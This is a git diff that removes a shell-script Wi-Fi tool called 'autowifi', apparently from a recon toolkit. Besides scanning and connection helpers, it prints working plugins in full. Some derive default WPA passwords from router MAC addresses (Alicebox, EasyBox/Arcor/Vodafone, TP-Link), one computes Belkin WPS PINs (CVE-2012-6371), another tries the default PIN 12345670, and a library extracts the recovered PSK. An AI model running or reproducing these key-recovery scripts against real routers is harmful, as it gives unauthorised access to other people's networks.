diff options
Diffstat (limited to 'recon/autowifi/usr/lib')
| -rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/core | 20 | ||||
| -rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/iwlist | 55 | ||||
| -rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/network | 40 | ||||
| -rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/openwrt | 18 | ||||
| -rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/plugin_core | 41 | ||||
| -rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant | 59 | ||||
| -rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/wps | 84 | ||||
| -rwxr-xr-x | recon/autowifi/usr/lib/autowifi/opt/udhcpc.run | 70 | ||||
| -rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/00profile | 11 | ||||
| -rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/01open | 6 | ||||
| -rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/02alice | 20 | ||||
| -rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/02easybox | 37 | ||||
| -rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/02tplink | 17 | ||||
| -rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps | 40 | ||||
| -rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/30default_wps | 18 |
15 files changed, 0 insertions, 536 deletions
diff --git a/recon/autowifi/usr/lib/autowifi/lib/core b/recon/autowifi/usr/lib/autowifi/lib/core deleted file mode 100644 index 80ae75b4..00000000 --- a/recon/autowifi/usr/lib/autowifi/lib/core +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/sh - -exists() { type "$1" >/dev/null 2>/dev/null; } - -run_hooks(){ - # (interface|profile) (pre|post) - typ=$1 - action=$2 - shift;shift - : ${interface?please provide interface} - if [ "$typ" = "interface" ];then - path=interface/$interface/$action - else - path=profile/$2/$action - fi - for hook in $(find "$root/etc/autowifi/hooks/$path" -type f 2>/dev/null | sort -u ); do - $hook "$@" - done -} - diff --git a/recon/autowifi/usr/lib/autowifi/lib/iwlist b/recon/autowifi/usr/lib/autowifi/lib/iwlist deleted file mode 100644 index a9f77f0c..00000000 --- a/recon/autowifi/usr/lib/autowifi/lib/iwlist +++ /dev/null @@ -1,55 +0,0 @@ -#!/bin/sh - -print_iwlist_env(){ - # takes environment: - # count - # MAC - # CHANNEL - # QUALITY - # ENCRYPTION - # ESSID - # WPA - # WPA2 - for i in ESSID MAC CHANNEL QUALITY ENCRYPTION WPA WPA2;do - eval echo ${i}_${count}=\$${i} - done -} - -iwlist_scan(){ - # usage: iwlist_scan $wifi-itf - ifconfig $wifi up - - count=0 - - iwlist ${1:-} scan 2>/dev/null | ( while read line; - do - case "$line" in - *"Cell "*) - [ $count -eq 0 ] || print_iwlist_env - WPA=0 - WPA2=0 - : $((count+=1)) - MAC="${line#*Address: }" - ;; - *Channel:*) - CHANNEL="${line#*:}" - ;; - *Quality=*) - QUALITY="`printf '%s' ${line#*Quality=} | cut -d/ -f 1`" - ;; - *"Encryption key:"*) - ENCRYPTION="${line#*key:}" - ;; - *ESSID:*) - ESSID="${line#*ESSID:}" - ;; - *"IE: IEEE 802.11i/WPA2"*) - WPA2=1 - ;; - *"IE: WPA Version 1"*) - WPA=1 - ;; - *);; - esac - done; print_iwlist_env ;echo WIFI_COUNT=$count) -} diff --git a/recon/autowifi/usr/lib/autowifi/lib/network b/recon/autowifi/usr/lib/autowifi/lib/network deleted file mode 100644 index a0105120..00000000 --- a/recon/autowifi/usr/lib/autowifi/lib/network +++ /dev/null @@ -1,40 +0,0 @@ -#!/bin/sh - -check_gateway(){ - ping -c 1 -w 5 $(ip route | awk '/default/{print $3}') >/dev/null -} -check_internet(){ - # TODO determine the loader, either wget or curl - secret=$(wget -O- http://krebsco.de/secret 2>/dev/null) - if [ "$secret" == "1337" ]; then - return 0 - else - echo "cannot load secret or secret incorrect" >&2 - return 1 - fi -} - -check_bandwidth(){ - echo $(curl http://www.microsoft.com/africa/4afrika/images/infographic.gif -w "%{speed_download}" -o /dev/null 2>/dev/null | sed 's/\..*//') -} - -ip_start(){ - : ${interface?interface variable not set} ${1?please provide method to start ip} - # usage: method [extra parms] - case "$1" in - dhcp) - if exists dhcpcd; then - dhcpcd -x $interface - dhcpcd -w -A $interface - elif exists dhclient; then - dhclient -x $interface - dhclient $interface - elif exists udhcpc; then - PIDFILE=/var/run/udhcpc-${interface}.pid - [ -e $PIDFILE ] && kill `cat $PIDFILE` ||: - udhcpc -n -p $PIDFILE -i $interface -s \ - "$root/usr/lib/autowifi/opt/udhcpc.run" - fi ;; - *) echo "do not know ip starter $1" >&2;; - esac -} diff --git a/recon/autowifi/usr/lib/autowifi/lib/openwrt b/recon/autowifi/usr/lib/autowifi/lib/openwrt deleted file mode 100644 index 3483c1fe..00000000 --- a/recon/autowifi/usr/lib/autowifi/lib/openwrt +++ /dev/null @@ -1,18 +0,0 @@ -#!/bin/sh -connect_wifi(){ - # channel ssid encryption key - uci set wireless.${iface}.mode=sta - - ifconfig $wifi up - uci set wireless.${radio}.channel=$1 - uci set "wireless.${iface}.ssid=$2" - if [ $3 == "none" ] ; then - uci set wireless.${iface}.encryption=none - uci -q delete wireless.${iface}.key - else - uci set "wireless.${iface}.key=$4" - uci set wireless.${iface}.encryption=$3 - fi - uci commit wireless - wifi up -} diff --git a/recon/autowifi/usr/lib/autowifi/lib/plugin_core b/recon/autowifi/usr/lib/autowifi/lib/plugin_core deleted file mode 100644 index e79a3c05..00000000 --- a/recon/autowifi/usr/lib/autowifi/lib/plugin_core +++ /dev/null @@ -1,41 +0,0 @@ -#!/bin/sh -parse_plugin_args(){ - [ $# -ne 4 ] && plugin_usage && exit 1 - # convenience function to put args in ENV variables - ESSID="$1" - - # mac is returned without colon - MAC=$(printf "%s" "$2" | sed 's/://g') - # split up the mac address to vendor and private part - VENDOR_MAC=${MAC:0:6} - PRIVATE_MAC=${MAC:6:12} - CHANNEL="$3" - ENC="$4" - if [ ${#MAC} -ne 12 ] ;then - echo "MAC malformed" - exit 1 - fi -} -plugin_usage(){ - cat << EOF -usage: $0 ESSID MAC CHANNEL ENC" - - ESSID - string - MAC - 00:11:22:33:44:55 - CHANNEL - 4 - ENC - wpa -EOF - -} - -check_vendor_mac(){ - needle="$(printf $1 | tr '[A-Z]' '[a-z]')" - shift - for i in "$@";do - [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0 - done - return 1 -} -check_painmode(){ - test -z "${painmode:-}" && echo "painmode required" && exit 1 -} diff --git a/recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant b/recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant deleted file mode 100644 index df9c2155..00000000 --- a/recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant +++ /dev/null @@ -1,59 +0,0 @@ -#!/bin/sh -start_wpa_supplicant(){ - wpa_conf=${1?please supply wpa_supplicant.conf path} - killall wpa_supplicant - sleep 1 -cat>$wpa_conf<<EOF -ctrl_interface=/var/run/wpa_supplicant -EOF - wpa_supplicant -i $interface -c $wpa_conf -B - sleep 4 -} -connect_wifi(){ - # bssid ssid encryption-string key - - wpa_cli reconfigure - - int=$(wpa_cli add_network | tail -1) - wpa_cli set_network $int ssid \"$2\" - wpa_cli set_network $int bssid $1 - #wpa_cli set_network $int ap_scan 1 - - if [ "$3" = "[ESS]" ]; then - wpa_cli set_network $int key_mgmt NONE - else - wpa_cli set_network $int key_mgmt WPA-PSK - wpa_cli set_network $int psk \"$4\" - fi - wpa_cli enable_network $int -} - -wifi_scan(){ - # usage: iwlist_scan $wifi-itf - - count=0 - wpa_cli scan >/dev/null - sleep 10 - - wpa_cli scan_results 2>/dev/null | egrep "^..:" | sed 's/ / /g' | (while IFS=' ' read MAC FREQ QUALITY ENCRYPTION ESSID - do - : $((count+=1)) - print_wifi_env - - done; echo WIFI_COUNT=$count) -} - -print_wifi_env(){ - # takes environment: - # MAC - # FREQ - # QUALITY - # ENCRYPTION - # ESSID - for i in MAC FREQ QUALITY ENCRYPTION ESSID;do - eval echo ${i}_${count}=\\\"\$"${i}"\\\" - done -} -wpa_supplicant_is_usable(){ - wpa_cli status >/dev/null 2>&1 -} diff --git a/recon/autowifi/usr/lib/autowifi/lib/wps b/recon/autowifi/usr/lib/autowifi/lib/wps deleted file mode 100644 index 5e9bbda7..00000000 --- a/recon/autowifi/usr/lib/autowifi/lib/wps +++ /dev/null @@ -1,84 +0,0 @@ -#!/bin/sh -has_wps(){ - # the-wpa_supplicant-encryption-string - echo "$1" | grep -q "\[WPS\]" -} -try_wps_pin(){ - # - # ESSID MAC CHANNEL ENC WPA WPA2 PIN - #set -ef - ESSID="$1" - MAC="$2" - CHANNEL="$3" - - # TODO refactor to use all the encryption - # the wpa_supplicant encryption string - ENC="$4" - - PIN="$5" - - [ "$ENC" == "[ESS]" ] && return 2 - WPA_CONF=/tmp/wpa_trywps.conf - WPA_LOG=/tmp/wpa_trywps.log - rm $WPA_LOG - #mkfifo $WPA_LOG - killall wpa_supplicant 2>/dev/null && sleep 1 - - cat > $WPA_CONF <<EOF -ctrl_interface=/var/run/wpa_supplicant -ctrl_interface_group=0 -update_config=1 -EOF - wpa_supplicant -Dwext -iwlan0 -c $WPA_CONF -f $WPA_LOG 2>&1 & - WPA_PID=$! - sleep 2 - if !(sudo wpa_cli wps_reg $MAC $PIN | grep -q OK) ;then - echo "wpa_cli wps_reg failed, bailing out!" - return 1 - fi - - # association failed - # exit 1 ;; - # TODO probably not posix compatible... - timeout(){ - ( timeout=10; - while [ $timeout -gt 0 ]; do - sleep 1; - kill -0 $$ 2> /dev/null || exit 0; - : $((timeout--)); - done ; - echo "TIMEOUT REACHED" ; - kill $$)& - exec $@ - } - - if ( timeout tail -f $WPA_LOG & echo "TAILPID: $!") | while read line ; do - bye(){ - printf "%s:" "$2" >&2 - kill $WPA_PID - kill -HUP $TAILPID - exit $1 - } - # DEBUG - #echo $line >&2 - case "$line" in - TAILPID:*)IFS=" " set -- $line; TAILPID=$2;; - *"WPS-FAIL msg=10 config_error=18"*) bye 1 "wrong pin";; - *"CTRL-EVENT-EAP-FAILURE EAP authentication failed"*) bye 1 "rate limiting";; - #*"Association request to the driver failed") bye 1 "wps not available";; - #*CTRL-EVENT-DISCONNECTED*):;; - *"CTRL-EVENT-DISCONNECTED bssid="*"reason=3 locally_generated=1"*)bye 1 "authentication failed, wps deactivated?";; - "TIMEOUT REACHED")bye 1 "timeout reached";; - *CTRL-EVENT-TERMINATING*) bye 1 "wpa_supplicant died";; - *CTRL-EVENT-CONNECTED*) bye 0 "yay connected";; - esac - done ; then - #echo "Connected!" - sed -n 's/[ \t]*psk="\(.*\)"$/\1/p' "$WPA_CONF" - return 0 - else - #echo "failed!" - return 1 - fi - -} diff --git a/recon/autowifi/usr/lib/autowifi/opt/udhcpc.run b/recon/autowifi/usr/lib/autowifi/opt/udhcpc.run deleted file mode 100755 index 2e1b919f..00000000 --- a/recon/autowifi/usr/lib/autowifi/opt/udhcpc.run +++ /dev/null @@ -1,70 +0,0 @@ -#!/bin/sh -# shamelessly stolen from http://www.doit.org/udhcpc/S50default - -PATH=/bin:/usr/bin:/sbin:/usr/sbin - -RESOLV_CONF="/etc/resolv.conf" - -update_interface() -{ - [ -n "$broadcast" ] && BROADCAST="broadcast $broadcast" - [ -n "$subnet" ] && NETMASK="netmask $subnet" - ifconfig $interface $ip $BROADCAST $NETMASK -} - -update_routes() -{ - if [ -n "$router" ] - then - echo "deleting routes" - while route del default gw 0.0.0.0 dev $interface - do : - done - - for i in $router - do - route add default gw $i dev $interface - done - fi -} - -update_dns() -{ - echo -n > $RESOLV_CONF - [ -n "$domain" ] && echo domain $domain >> $RESOLV_CONF - for i in $dns - do - echo adding dns $i - echo nameserver $i >> $RESOLV_CONF - done -} - -deconfig() -{ - ifconfig $interface 0.0.0.0 -} - -case "$1" in - bound) - update_interface; - update_routes; - update_dns; - ;; - - renew) - update_interface; - update_routes; - update_dns; - ;; - - deconfig) - deconfig; - ;; - - *) - echo "Usage: $0 {bound|renew|deconfig}" - exit 1 - ;; -esac - -exit 0 diff --git a/recon/autowifi/usr/lib/autowifi/plugins/00profile b/recon/autowifi/usr/lib/autowifi/plugins/00profile deleted file mode 100755 index d7fb9c75..00000000 --- a/recon/autowifi/usr/lib/autowifi/plugins/00profile +++ /dev/null @@ -1,11 +0,0 @@ -#!/bin/sh -#ESSID MAC CHANNEL ENCRYPTION WPA WPA2 -# ENV: -# root (default: /) -root=${root:-/} -cat $root/etc/autowifi/wifi_keys 2>/dev/null | (while IFS='|' read SSID MAC BANDWIDTH KEY; do - if [ "$1" == "$SSID" -a "$2" == "$MAC" ]; then - echo $KEY - exit 0 - fi -done; exit 1) diff --git a/recon/autowifi/usr/lib/autowifi/plugins/01open b/recon/autowifi/usr/lib/autowifi/plugins/01open deleted file mode 100755 index 881f47ea..00000000 --- a/recon/autowifi/usr/lib/autowifi/plugins/01open +++ /dev/null @@ -1,6 +0,0 @@ -#!/bin/sh -#ESSID MAC CHANNEL ENCRYPTION -if [ "$4" == "[ESS]" ]; then - exit 0 -fi -exit 1 diff --git a/recon/autowifi/usr/lib/autowifi/plugins/02alice b/recon/autowifi/usr/lib/autowifi/plugins/02alice deleted file mode 100755 index 1b4533a4..00000000 --- a/recon/autowifi/usr/lib/autowifi/plugins/02alice +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/sh -# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm: -# Based on Poc from -# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html -# -# -# ESSID MAC CHANNEL ENCRYPTION - -cd $(dirname $(readlink -f $0)) -. ../lib/plugin_core - -parse_plugin_args "$@" - -! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1 - -# printf always makes string to lower, need that for correct md5sum -ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) -TMP=$(printf $ETHMAC | md5sum) -printf ${TMP:0:12} | base64 -exit 0 diff --git a/recon/autowifi/usr/lib/autowifi/plugins/02easybox b/recon/autowifi/usr/lib/autowifi/plugins/02easybox deleted file mode 100755 index 3d7cb8c1..00000000 --- a/recon/autowifi/usr/lib/autowifi/plugins/02easybox +++ /dev/null @@ -1,37 +0,0 @@ -#!/bin/sh -#ESSID MAC CHANNEL ENCRYPTION WPA WPA2 - -cd $(dirname $(readlink -f $0)) -. ../lib/plugin_core -parse_plugin_args "$@" - -if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then - echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone" - exit 1 -else - - # Fill up to 4 places with zeros, if necessary: - deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g') - # - # The digits M9 to M12 are just the last digits (9.-12.) of the MAC: - hexi=$(echo ${MAC:8:4} | sed 's/./& /g') - #echo 'M4 (Hex): ' ${hexi[@]} - # K1 = last byte of (d0 + d1 + h2 + h3) - # K2 = last byte of (h0 + h1 + d2 + d3) - c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1}) - c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1}) - K1=$((($c1)%16)) - K2=$((($c2)%16)) - #printf "K1: %x\n" $K1 - #printf "K2: %x\n" $K2 - X1=$((K1^${deci:6:1})) - X2=$((K1^${deci:4:1})) - X3=$((K1^${deci:2:1})) - Y1=$((K2^0x${hexi:2:1})) - Y2=$((K2^0x${hexi:4:1})) - Y3=$((K2^0x${hexi:6:1})) - Z1=$((0x${hexi:4:1}^${deci:6:1})) - Z2=$((0x${hexi:6:1}^${deci:4:1})) - Z3=$((K1^K2)) - printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F -fi diff --git a/recon/autowifi/usr/lib/autowifi/plugins/02tplink b/recon/autowifi/usr/lib/autowifi/plugins/02tplink deleted file mode 100755 index b2b96f95..00000000 --- a/recon/autowifi/usr/lib/autowifi/plugins/02tplink +++ /dev/null @@ -1,17 +0,0 @@ -#!/bin/sh -# Implementation of TP-Link default WPA Key -# Based on -# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481 - -cd $(dirname $(readlink -f $0)) -. ../lib/plugin_core - -parse_plugin_args "$@" - -! check_vendor_mac $VENDOR_MAC "F8D111" && echo "$VENDOR_MAC not affected" && exit 1 -! echo $ESSID | egrep -q '^tp' && echo "$ESSID not affected" && exit 1 - - -# printf always makes string to lower, need that for correct md5sum -printf ${MAC:4:12} -exit 0 diff --git a/recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps b/recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps deleted file mode 100755 index d4eb8e37..00000000 --- a/recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps +++ /dev/null @@ -1,40 +0,0 @@ -#!/bin/sh -# thanks to http://ednolo.alumnos.upv.es/?p=1295G -# for the PoC code -# Calculates the default WPS pin of Belkin Routers and returns the WPA key -# -# Implementation of CVE-2012-6371 - -# works : -# Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000 -# belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000 -# belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000 - -cd $(dirname $(readlink -f $0)) -. ../lib/plugin_core -. ../lib/wps -parse_plugin_args "$@" - -check_painmode - -! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1 - -calc_belkin(){ - PRIVATE_MAC=${1} - - p=$((0x$PRIVATE_MAC % 10000000)) - wps_pin_checksum(){ - pin=$1 - accum=0 - while [ $pin -ne 0 ];do - accum=$((accum + (3 * (pin % 10)) )) - pin=$((pin/10)) - accum=$((accum + pin %10 )) - pin=$((pin/10)) - done - echo $(( (10 - accum % 10) % 10)) - } - printf "%07d%d" $p $(wps_pin_checksum $p) - return 0 -} -try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC}) diff --git a/recon/autowifi/usr/lib/autowifi/plugins/30default_wps b/recon/autowifi/usr/lib/autowifi/plugins/30default_wps deleted file mode 100755 index 50ad2676..00000000 --- a/recon/autowifi/usr/lib/autowifi/plugins/30default_wps +++ /dev/null @@ -1,18 +0,0 @@ -#!/bin/sh -# on MANY WPS-enabled devices the pin is 12345670 , so we can give it a shot -# http://www.wotan.cc/?p=75 -cd $(dirname $(readlink -f $0)) -. ../lib/wps -. ../lib/plugin_core - -parse_plugin_args "$@" -check_painmode -DEFAULT_PIN="${DEFAULT_PIN:-12345670}" - -if has_wps "$ENC"; then - echo "trying PIN $DEFAULT_PIN against $ESSID" >&2 - try_wps_pin "$@" $DEFAULT_PIN -else - echo "Network $ESSID not WPS enabled" - exit 1 -fi |